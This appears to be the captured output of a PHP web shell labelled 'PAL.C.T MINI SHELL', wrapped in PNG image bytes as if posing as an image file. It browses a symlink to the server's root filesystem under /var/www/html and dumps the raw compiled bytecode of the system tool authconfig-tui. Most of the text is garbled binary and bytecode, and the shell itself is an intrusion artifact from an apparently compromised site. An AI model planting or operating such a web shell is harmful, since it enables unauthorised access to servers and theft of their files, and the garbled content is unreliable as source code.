php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/authconfig/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/authconfig/authconfig-tui.pyc

+>Tc@soddkZddkZddkZddkZddkZddkZeiZddkl	Z	l
Z
ddkZeiei
ddZedoddkZnde	fdYZde
fd	YZd
fdYZdefd
YZedjo]eieieieidedo
eZn
eZeieindS(iN(tOptionParsertIndentedHelpFormattertcCstidi|djS(Ni(tsystargvtfind(tname((s'/usr/share/authconfig/authconfig-tui.pytrunsAs#ssauthconfig-tuitUnihelpOptionParsercBseZddZRS(cCs|djo
ti}nti}t|dd}|p
|djo
|}n|i|ii|i	|ddS(Ntencodingtasciitreplace(
tNoneRtstdouttlocaletgetpreferredencodingtgetattrtwritetformat_helptdecodetencode(tselftfiletsrcencodingR	((s'/usr/share/authconfig/authconfig-tui.pyt
print_help*s


N(t__name__t
__module__RR(((s'/usr/share/authconfig/authconfig-tui.pyR)stNonWrapFormattercBseZdZRS(cCsg}|i|}|i|id}t||jo#d|id|f}|i}n9d|id||f}d|id||f}d}|i||io-|i|}|id|d|fn#|ddjo|idndi|S(Nis%*s%s
Rs	%*s%-*s  iis
(toption_stringst
help_positiontcurrent_indenttlentappendthelptexpand_defaulttjoin(Rtoptiontresulttoptst	opt_widthtindent_firstt	help_text((s'/usr/share/authconfig/authconfig-tui.pyt
format_option4s 



(RRR*(((s'/usr/share/authconfig/authconfig-tui.pyR3st
AuthconfigcBs}eZdZdZdZdZdZdZdZdZ	dZ
d	Zd
ZdZ
dZRS(
cCsCt|_t|_t|_t|_t|_t|_d|_dS(Ni(tFalset	nis_availtkerberos_availt
ldap_availt
sssd_availtcache_availt
fprintd_availtretval(R((s'/usr/share/authconfig/authconfig-tui.pyt__init__Xs						cCsdS(Nt
authconfig((R((s'/usr/share/authconfig/authconfig-tui.pytmoduleascCs$tiid|i|fdS(Ns%s: %s
(RtstderrRR6(Rterror((s'/usr/share/authconfig/authconfig-tui.pyt
printErrordscCsyd}d}x\|D]T}|djo|d7}n|o|t|d7}n||7}|d7}qW|d7}|S(Nit<t|t=it>(tstr(RtltaddidxtidxR!titem((s'/usr/share/authconfig/authconfig-tui.pytlistHelpgs


c	Cstd|i}|idjo|d7}nt|dtdt}|idddd	d	td
|idddd
d	td|iddd
d	td|idddd
d	td|iddd
d	td|idd|ititd	td|iddd
d	td|iddd
d	td|iddtdd	td|id dtd!d	td"|id#dd
d	td$|id%dd
d	td&|id'dd
d	td(|id)dd
d	td*|id+dtd!d	td,|id-dtd.d	td/|id0d1dd
d	td2|id3d4dd
d	td5|id6dd
d	td7|id8dd
d	td9|id:dtd;d	td<|id=dd
d	td>|id?dd
d	td@|idAdd
d	tdB|idCdd
d	tdD|idEdtdFd	tdG|iti	t
}|idHd|d	tdI|idJdd
d	tdK|idLdd
d	tdM|idNdd
d	tdO|idPdd
d	tdQ|idRdtd!d	tdS|idTdtd!d	tdU|idVdtdWd	tdX|idYdd
d	tdZ|id[dd
d	td\|id]dd
d	td^|id_dd
d	td`|idadd
d	tdb|idcdd
d	tdd|idedd
d	tdf|idgdd
d	tdh|ididdjd	tdk|idldtdWd	tdm|idndtdod	tdp|idqdtdrd	tds|idtdudvdtdwd	tdx|idyddzd	td{|id|dd}d	td~|idddd	td|idddd	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|idddd	td|iddd
d	td|iddd
d	td|iddtdd	td|iddtdWd	td|iddtdod	td|iddd
d	td|iddd
d	td|idddd	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|idddd	td|idddd	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|iddd
d	td|idjoB|iddd
d	td|iddd
d	tdn#|idddd
d	td|iddd
d	td|iddd
d	td|iddtdd	td|iddtdd	td|iddd
d	td|i\|_}|o$|i
tdtidn|idjo}|iioo|iioa|iioS|iioE|iio7|iio)|iio|itidndS(Nsusage: %s [options]R5se {--update|--updateall|--test|--probe|--restorebackup <name>|--savebackup <name>|--restorelastbackup}tadd_help_optiont	formatters-hs--helptactionR!sshow this help message and exits--enableshadows--useshadowt
store_trues$enable shadowed passwords by defaults--disableshadows%disable shadowed passwords by defaults--enablemd5s--usemd5senable MD5 passwords by defaults--disablemd5s disable MD5 passwords by defaults
--passalgotmetavars&hash/crypt algorithm for new passwordss--enableniss*enable NIS for user information by defaults--disableniss+disable NIS for user information by defaults--nisdomains<domain>sdefault NIS domains--nisservers<server>sdefault NIS servers--enableldaps+enable LDAP for user information by defaults
--disableldaps,disable LDAP for user information by defaults--enableldapauths)enable LDAP for authentication by defaults--disableldapauths*disable LDAP for authentication by defaults--ldapservers#default LDAP server hostname or URIs--ldapbasedns<dn>sdefault LDAP base DNs--enableldaptlss--enableldapstarttlss&enable use of TLS with LDAP (RFC-2830)s--disableldaptlss--disableldapstarttlss'disable use of TLS with LDAP (RFC-2830)s--enablerfc2307bissBenable use of RFC-2307bis schema for LDAP user information lookupss--disablerfc2307bissCdisable use of RFC-2307bis schema for LDAP user information lookupss--ldaploadcacerts<URL>s load CA certificate from the URLs--enablesmartcards0enable authentication with smart card by defaults--disablesmartcards1disable authentication with smart card by defaults--enablerequiresmartcards0require smart card for authentication by defaults--disablerequiresmartcards7do not require smart card for authentication by defaults--smartcardmodules<module>s default smart card module to uses--smartcardactions(action to be taken on smart card removals--enablefingerprints9enable authentication with fingerprint readers by defaults--disablefingerprints:disable authentication with fingerprint readers by defaults--enablekrb5s)enable kerberos authentication by defaults
--disablekrb5s*disable kerberos authentication by defaults	--krb5kdcsdefault kerberos KDCs--krb5adminserversdefault kerberos admin servers--krb5realms<realm>sdefault kerberos realms--enablekrb5kdcdnss'enable use of DNS to find kerberos KDCss--disablekrb5kdcdnss(disable use of DNS to find kerberos KDCss--enablekrb5realmdnss)enable use of DNS to find kerberos realmss--disablekrb5realmdnss*disable use of DNS to find kerberos realmss--enablewinbinds.enable winbind for user information by defaults--disablewinbinds/disable winbind for user information by defaults--enablewinbindauths,enable winbind for authentication by defaults--disablewinbindauths-disable winbind for authentication by defaults
--smbsecuritys<user|server|domain|ads>s*security mode to use for samba and winbinds
--smbrealms5default realm for samba and winbind when security=adss--smbserverss	<servers>s(names of servers to authenticate againsts--smbworkgroups<workgroup>s'workgroup authentication servers are ins--smbidmapranges
--smbidmapuids
--smbidmapgids<lowest-highest>s4uid range winbind will assign to domain or ads userss--winbindseparators<\>sthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enableds--winbindtemplatehomedirs
</home/%D/%U>sGthe directory which winbind-created users will have as home directoriess--winbindtemplateprimarygroups<nobody>sFthe group which winbind-created users will have as their primary groups--winbindtemplateshells</bin/false>sDthe shell which winbind-created users will have as their login shells--enablewinbindusedefaultdomains[configures winbind to assume that users with no domain in their user names are domain userss --disablewinbindusedefaultdomains_configures winbind to assume that users with no domain in their user names are not domain userss--enablewinbindofflines)configures winbind to allow offline logins--disablewinbindofflines+configures winbind to prevent offline logins
--winbindjoins<Administrator>s>join the winbind domain or ads realm now as this administrators
--enableipav2s?enable IPAv2 for user information and authentication by defaults--disableipav2s@disable IPAv2 for user information and authentication by defaults
--ipav2domains-the IPAv2 domain the system should be part ofs--ipav2realmsthe realm for the IPAv2 domains
--ipav2serversthe server for the IPAv2 domains--enableipav2nontps-do not setup the NTP against the IPAv2 domains--disableipav2nontps0setup the NTP against the IPAv2 domain (default)s--ipav2joins	<account>s%join the IPAv2 domain as this accounts--enablewinss#enable wins for hostname resolutions
--disablewinss$disable wins for hostname resolutions--enablepreferdnss3prefer dns over wins or nis for hostname resolutions--disablepreferdnss:do not prefer dns over wins or nis for hostname resolutions--enablehesiods-enable hesiod for user information by defaults--disablehesiods.disable hesiod for user information by defaults--hesiodlhss<lhs>sdefault hesiod LHSs--hesiodrhss<rhs>sdefault hesiod RHSs--enablesssdsOenable SSSD for user information by default with manually managed configurations
--disablesssdsVdisable SSSD for user information by default (still used for supported configurations)s--enablesssdauthsMenable SSSD for authentication by default with manually managed configurations--disablesssdauthsSdisable SSSD for authentication by default (still used for supported configurationss--enableforcelegacys;never use SSSD implicitly even for supported configurationss--disableforcelegacys4use SSSD implicitly if it supports the configurations--enablecachecredss5enable caching of user credentials in SSSD by defaults--disablecachecredss6disable caching of user credentials in SSSD by defaults
--enablecachesXenable caching of user information by default (automatically disabled when SSSD is used)s--disablecaches.disable caching of user information by defaults--enablelocauthorizes1local authorization is sufficient for local userss--disablelocauthorizes1authorize local users also through remote services--enablepamaccesss.check access.conf during account authorizations--disablepamaccesss5do not check access.conf during account authorizations--enablesysnetauths0authenticate system accounts by network servicess--disablesysnetauths0authenticate system accounts by local files onlys--enablemkhomedirs6create home directories for users on their first logins--disablemkhomedirs=do not create home directories for users on their first logins	--nostarts+do not start/stop portmap, ypbind, and nscds--tests>do not update the configuration files, only print new settingssauthconfig-tuis--backs<display Back instead of Cancel in the main dialog of the TUIs--kickstarts1do not display the deprecated text user interfaces--updatesDopposite of --test, update configuration files with changed settingss--updateallsupdate all configuration filess--probes)probe network for defaults and print thems--savebackups<name>s(save a backup of all configuration filess--restorebackups)restore the backup of configuration filess--restorelastbackupsXrestore the backup of configuration files saved before the previous configuration changesunexpected argumenti(t_R6RR,Rt
add_optionRCtauthinfotpassword_algorithmstgetSmartcardActionstTruet
parse_argstoptionsR9Rtexittprobettesttupdatet	updateallt
savebackupt
restorebackuptrestorelastbackupR(Rtusagetparsertactshelptargs((s'/usr/share/authconfig/authconfig-tui.pytparseOptionsts


































































































"*
cCsti|i}|i|io#|iod|i|ifGHn|io#|iod|i|ifGHn|io-d|i|i	pd|i
pdfGHndS(Nshesiod %s/%ssldap %s/%s
skrb5 %s/%s/%s
R(RKtAuthInfoR9RRt	hesiodLHSt	hesiodRHSt
ldapServert
ldapBaseDNt
kerberosRealmtkerberosKDCtkerberosAdminServer(Rtinfo((s'/usr/share/authconfig/authconfig-tui.pyRRps
		
	cCsNti|i|_|ii|_|iidjot|i_ndS(N(	RKtreadR9RftcopytpristineinfotenableLocAuthorizeRRN(R((s'/usr/share/authconfig/authconfig-tui.pytreadAuthInfo}scCstititiotititi|_tititi|_titi	tiotiti
ti|_tititiotiti
ti|_tititi|_tititi|_dS(N(tostaccessRKtPATH_YPBINDtX_OKtPATH_LIBNSS_NISR-t
PATH_PAM_KRB5R.t
PATH_PAM_LDAPtPATH_LIBNSS_LDAPR/tPATH_PAM_SSStPATH_LIBNSS_SSSR0t	PATH_NSCDR1tPATH_PAM_FPRINTDR2(R((s'/usr/share/authconfig/authconfig-tui.pyttestAvailableSubsyssc
Cshdd6dd6dd6dd6d	d
6dd6d
d6dd6dd6dd6dd6dd6dd6dd6dd6dd 6d!d"6d#d$6d%d&6d'd(6d)d*6d+d,6d-d.6d/d06d1d26d3d46d5d66d7d86d9d:6d;d<6}hd=d>6d?d@6dAdB6dCdD6dEdF6dGdH6dIdJ6dKdL6dMdN6dOdP6dQdR6dSdT6dUdV6dWdX6dYdZ6d[d\6d]d^6d_d`6dadb6dcdd6dedf6dgdh6didj6dkdl6dmdn6}xv|iD]h\}}t|ido|ot|i|tnt|idp|ot|i|tqqWy-|iiod|i_n
dq|i_Wnt	j
onX|ii
oY|ii
|iijo@|ii|ii
|i_
|ii|ii
|i_nxV|iD]H\}}t|i|djo#t|i|t|i|qqW|iioS|iiidrds}|dt|i_t|dsjo|ds|i_qhn|iidjo|ii|i_n|iioky,t|ii}ti||i_Wq	ttfj
o&|itdudq|i_q	Xn|ii p>|ii!odv|i_"n|ii#odw|i_"qnC|ii ti$jo,|itdxdy|i_"dz|_%ndS({NtenableShadowtshadowRjtlocauthorizetenablePAMAccesst	pamaccesstenableSysNetAutht
sysnetauthtenableMkHomeDirt	mkhomedirtenableCachetcachetenableHesiodthesiodt
enableLDAPtldaptenableLDAPStldaptlstenableRFC2307bist
rfc2307bistenableLDAPAuthtldapauthtenableKerberostkrb5t	enableNIStnistkerberosKDCviaDNSt
krb5kdcdnstkerberosRealmviaDNStkrb5realmdnstenableSmartcardt	smartcardt
enableFprintdtfingerprinttforceSmartcardtrequiresmartcardt
enableWinbindtwinbindtenableWinbindAuthtwinbindauthtwinbindUseDefaultDomaintwinbindusedefaultdomaintwinbindOfflinetwinbindofflinetenableIPAv2tipav2t
ipav2NoNTPt
ipav2nontpt
enableWINStwinst
enableSSSDtsssdtenableSSSDAuthtsssdauthtenableForceLegacytforcelegacytenableCacheCredst
cachecredstpreferDNSinHostst	preferdnstpasswordAlgorithmtpassalgoR_t	hesiodlhsR`t	hesiodrhsRat
ldapserverRbt
ldapbasednt
ldapCacertURLtldaploadcacertRct	krb5realmRdtkrb5kdcRetkrb5adminservertsmartcardModuletsmartcardmoduletsmartcardActiontsmartcardactiont	nisDomaint	nisdomaint	nisServert	nisservertsmbWorkgrouptsmbworkgroupt
smbServerst
smbserverstsmbSecuritytsmbsecuritytsmbRealmtsmbrealmt
smbIdmapRanget
smbidmaprangetwinbindSeparatortwinbindseparatortwinbindTemplateHomedirtwinbindtemplatehomedirtwinbindTemplatePrimaryGrouptwinbindtemplateprimarygrouptwinbindTemplateShelltwinbindtemplateshelltipav2Domaintipav2domaint
ipav2Realmt
ipav2realmtipav2Servertipav2servertenabletdisableRt%iis(Bad smart card removal action specified.tmd5tdescrypts;Unknown password hashing algorithm specified, using sha256.tsha256i(&t	iteritemsRRPtsetattrRfRNR,Rt
ldapSchematAttributeErrorRRctgetKerberosKDCRdtgetKerberosAdminServerReRtwinbindjointsplittjoinUserRtjoinPasswordt	ipav2joinRtintRKRMRt
ValueErrort
IndexErrorR9RIRt	enablemd5Rt
disablemd5RLR3(Rt
bool_settingststring_settingstopttaivaltlstRA((s'/usr/share/authconfig/authconfig-tui.pytoverrideSettingss





&"
'




cCstS(N(RN(R((s'/usr/share/authconfig/authconfig-tui.pytdoUIscCsnt}|iio|iit}n|iidjo.|iito|iiqjt	}n|S(N(
RNRPRRft
joinDomainRRt
joinIPADomaintwriteSysconfigR,(Rtret((s'/usr/share/authconfig/authconfig-tui.pyRs

cCs|ii|iio!|iip
d|_q;n|ii|iio!|iip
d|_qn$|ii	|i
p
d|_n|ip
d|_n|ii|ii
dS(Niii(RfttestLDAPCACertsRtdownloadLDAPCACertR3trehashLDAPCACertsRPRURtwriteChangedRiRtposttnostart(R((s'/usr/share/authconfig/authconfig-tui.pyt
writeAuthInfos






cCs|i|iio|itidn|iio7tidjo$|it	dtidn|i
|iio'|ii
}tit|n|iio0|ii|ii}tit|n|iio0|ii|ii}tit|n|i|i|ip5|iio|it	dntidn|iio|iin|i|iS(Niscan only be run as rootisdialog was cancelledi(R]RPRRRRQRSRltgetuidR9RIRkRXRftrestoreLastRRWt
restoreBackupRVt
saveBackupRxRRt	printInfoRR3(Rtrv((s'/usr/share/authconfig/authconfig-tui.pytruns6


!









(RRR4R6R9RCR]RRRkRxRRRRR
(((s'/usr/share/authconfig/authconfig-tui.pyR+Ws					
		
			k			t
AuthconfigTUIcBseZdZdZdZdZdddZdZdZ	dZ
dZd	Zd
Z
dZdZd
ZdZRS(cCsdS(Nsauthconfig-tui((R((s'/usr/share/authconfig/authconfig-tui.pyR6;scCs2|iio!|iio|iitndS(N(RPt	kickstartRRfRRN(R((s'/usr/share/authconfig/authconfig-tui.pyR>scCs|pdSx|o|d}|d}t|tjo@|iio|d}|d}q}|d}|d}nti|tipItd||d|f}ti	|i
td|tdgn|d}qWdS(NiiisThe %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.tWarningtOki(ttypettupleRft
sssdSupportedRlRmtR_OKRItsnacktButtonChoiceWindowtscreen(Rttoggletwarningtpathtpackagettext((s'/usr/share/authconfig/authconfig-tui.pytwarnCs"



	,c#
CsMtitdddg}titdddg}titiftdd6dg}titiftdd7dg}titi	ftd
d8dg}ti
tdd
dg}titdddg}titdddg}ti
tdd|g}	titdd|	g}
tidd}titd}|i|ddddddtitdt|ii}
}|i|ddddddtitdt|ii}}|i|ddddddtitdt|ii}}|i|ddddddtitdt|ii}}|i|dd ddddtitd!t|ii}}|i|dd"ddddtidd#}titd$}|i|ddddddtitd%t|iid&j}}|i|ddddddtitd't|ii}}|i|ddddddtitd(t|ii}}|i|ddddddtitd)t|ii}}|i|dd ddddtitd*t|ii}}|i|dd"ddddtitd+t|ii }}|i|ddddddtitd,t|ii!}}|i|dd-ddddtidd}|i|ddddd.dd/d9|i|ddd0dd.dd/d:tidd}ti"|i#i$o
td1p
td2}ti"td3}|i|dd|i|ddtidd}|i|dddd|i|ddddti%} |i&i'|td4| i(|| i)}||jo|
i*|i_|i*|i_|i*|i_|i*|i_|i*|i_|i*|i_|i*od&|i_n$|iid&jod5|i_n|i*|i_|i*|i_|i*|i_ |i*|i_!|i*|i_|ii|f|ii|f|ii|f|ii|
f|ii|f|ii|f|ii|f|ii|f|ii |	fg	}!x*|!D]}"|i+|"d|"dqWn|i&i,||jS(;NtcachingtnscdsFingerprint readertpam_fprintdtKerberostpam_krb5ssssd-clientsLDAP authenticationtpam_ldaptLDAPs
nss-pam-ldapdtNIStypbindsshadow passwordsshadow-utilstWinbindssamba-clientsWinbind authenticationssamba-commoniisUser Informationit
anchorLefttgrowxsCache InformationsUse LDAPisUse NISis	Use IPAv2isUse WinbindiitAuthenticationsUse MD5 PasswordsRsUse Shadow PasswordssUse LDAP AuthenticationsUse KerberossUse Fingerprint readersUse Winbind Authentications!Local authorization is sufficientit	anchorToptpaddingtanchorRighttBacktCanceltNextsAuthentication ConfigurationR(R#ssssd-client(R$ssssd-client(s
nss-pam-ldapdssssd-client(iiii(iiii(-RKRvRIRRwRqRtRrRsRuRntPATH_PWCONVtPATH_WINBIND_NETtPATH_PAM_WINBINDtPATH_LIBNSS_WINBINDRtGridtLabeltsetFieldtCheckboxtboolRfRRRRRRRyRRRRRjtButtonRPtbacktFormRtgridWrappedWindowtaddR
tselectedRt	popWindow(#Rt	warnCachetwarnFprintdtwarnKerberostwarnLDAPAuthtwarnLDAPtwarnNISt
warnShadowtwarnWinbindNettwarnWinbindAuthtwarnWinbindtinfoGridtcompRtcbRRRRtauthGridRRztldapaRtfprintdRR{tmechGridt
buttonGridtcanceltoktmainGridtformtallwarningsR((s'/usr/share/authconfig/authconfig-tui.pytgetMainChoicesWs$$$(((((.((((((%%/


 
cCst|}tid|}d}	g}
xx|D]p\}}}
}|djopti|tt|i|
}|
i||iti	dd|	dd|i|d|	ddn|djo|ti	|}|i|d|	d	dddti
d
t|i|
d|}|
i||i|d|	ddnO|d
joti	|}|i|d|	d	dddddy#t|i|
}|i|Wntj
o|d}nXd}g}x*|D]"}|i||||jfqWtid|}|
i||i|d|	ddnV|djoHtid|dddd}|
i||i|d|	ddn|	d7}	q1Wti|odpdd}ti|}ti|}|oti|pd}|i|dd|o|i|ddn|i||odpddtidd}|i|ddd	ddd|i|ddd	dddti}|ii|||i|x)to!|i}||joPn|
}x|D]\}}}
}|djo&t|i|
|idiq|djo&t|i|
|idiq|d
jo&t|i|
|idiq|djo|idqqW||joPn|o|qqW|ii||jS(NiittfvalueRR.iR)tsvalueR-i(thiddenR*trvalueR,tlvaluei2tflexDowntflexUpi(iiii(iiii(iiii(iiii(RRR6R9R:RRfR R8R7tEntrytindexRRtRadioBartTextboxReflowedR;R=RR>R?RNR
RtpopR@tvaluetgetSelectionRA(Rtdtitletitemst	canceltxttoktxtt
anothertxtt	anothercbtrowstquestionGridtrowtwidgetstttdesctattrtvalRNRMtselt
buttonlisttvtradioBarRSRTRUtanotherRVRWtwcopy((s'/usr/share/authconfig/authconfig-tui.pytgetGenericChoicess
$
"
$

% 


 !


&
&
&


c	Csdtdddfdtdddfdtdddfg}|itd	|td
|o
tdp
tdd
tdd|iS(NR[sDomain:RisRealm:RsServer:RsIPAv2 SettingsR/R1RRlsJoin DomainRm(RIR|tmaybeGetJoinSettings(Rtnextt	questions((s'/usr/share/authconfig/authconfig-tui.pytgetIPAv2Settings(s,cCsdtdddfdtdddfdtdd	dfg}|itd
|td|o
tdp
td
S(NRZsUse TLSRR[sServer:RaisBase DN:Rbs
LDAP SettingsR/R1R(RIRR|(RR~R((s'/usr/share/authconfig/authconfig-tui.pytgetLDAPSettings0s
cCsldtdddfdtdddfg}|itd|td|o
td	p
td
S(NR[sDomain:RisServer:RsNIS SettingsR/R1R(RIR|(RR~R((s'/usr/share/authconfig/authconfig-tui.pytgetNISSettings7scCsdtdddfdtdddfdtdddfd	td
ddfd	tdd
dfg}|itd|td|o
tdp
tdS(NR[sRealm:RcisKDC:Rds
Admin Server:ReRZs"Use DNS to resolve hosts to realmsRs!Use DNS to locate KDCs for realmsRsKerberos SettingsR/R1R(RIRR|(RR~R((s'/usr/share/authconfig/authconfig-tui.pytgetKerberosSettings=scCsdtdddfdtdddfg}|iipd|i_n|itd	|td
tdom|ii|ii|iio|iit	n"|ii
o|iit	n|iint	S(NR[sDomain Administrator:Ris	Password:Rit
Administrators
Join SettingsR0R(
RIRfRR|RtsuspendRTRRRNRRtresume(RR((s'/usr/share/authconfig/authconfig-tui.pytgetJoinSettingsFs




cCsdtdddfg}ti|i}|i|iit}|ii|o.|i	td|tdtd}n|o|ii
n|itS(NR^sSome of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?s
Save SettingstNotYes(
RIRRKRgR9RTRfR,tdiffersR|RRRN(RRt	orig_infoR((s'/usr/share/authconfig/authconfig-tui.pyR}Vs	


c	Csddg}ddddddg}d	}t||}d
tdd|fd
tdddfd
tdddfd
tdddfd
tdd|fg}|itd|td|o
tdp
tddtdd|iS(Ntadstdomains
/sbin/nologins/bin/shs	/bin/bashs	/bin/tcshs/bin/kshs/bin/zshcSsti|tiS(N(RlRmRo(tshell((s'/usr/share/authconfig/authconfig-tui.pytshellexistsksR]sSecurity Model:RR[sDomain:RisDomain Controllers:Rs
ADS Realm:RsTemplate Shell:RsWinbind SettingsR/R1RRlsJoin DomainRm(tfilterRIR|R}(RR~tsecuritytshellsRR((s'/usr/share/authconfig/authconfig-tui.pytgetWinbindSettingsfs		,cCsbd}t}xI|djo;|djo.|ii|djo|i}n|djoq|iio`|iip>|iip1|iip$|iip|ii	p
|ii
}|i|}q'nW|djod|iip
|iioF|iip$|iip|ii	p
|ii
}|i|}q'n|djoJ|iio9|iip|ii	p
|ii
}|i
|}q'n|djo=|iio,|ii	p
|ii
}|i|}q'nE|djo7|ii	p
|ii
ot}|i|}q'n|ii|o|d7}q|d8}qW|djS(	Niiiiiiii(R,RfRTRYRRRRRRRRRRRR(RR~trctmore((s'/usr/share/authconfig/authconfig-tui.pyt
getChoices{sV





















cCsBtd|ii}ti|itd|tdgdS(NsTo connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.RR(RIRft
ldapCacertDirRRR(RR((s'/usr/share/authconfig/authconfig-tui.pytdisplayCACertsMessages	
cCs|iiotSzti|_|i}|iitd|ii	dd|d|i
p|iitS|i
io|i
io|inWd|iiXtS(NsN <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screenis - (c) 1999-2005 Red Hat, Inc.(RPRRNRtSnackScreenRR6tpushHelpLineRItdrawRootTextRtfinishR,RfRRR(Rtpackageversion((s'/usr/share/authconfig/authconfig-tui.pyRs


N(RRR6RRRYRR|RRRRRR}RRRR(((s'/usr/share/authconfig/authconfig-tui.pyR:s				r_									-	t__main__R5(RKtacutiltgettextRltsignalRtlgettextRItoptparseRRRt	setlocaletLC_ALLRRRRR+RRtSIGINTtSIG_DFLt
textdomainR6RQR
(((s'/usr/share/authconfig/authconfig-tui.pyt<module>s*0		

$



	
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`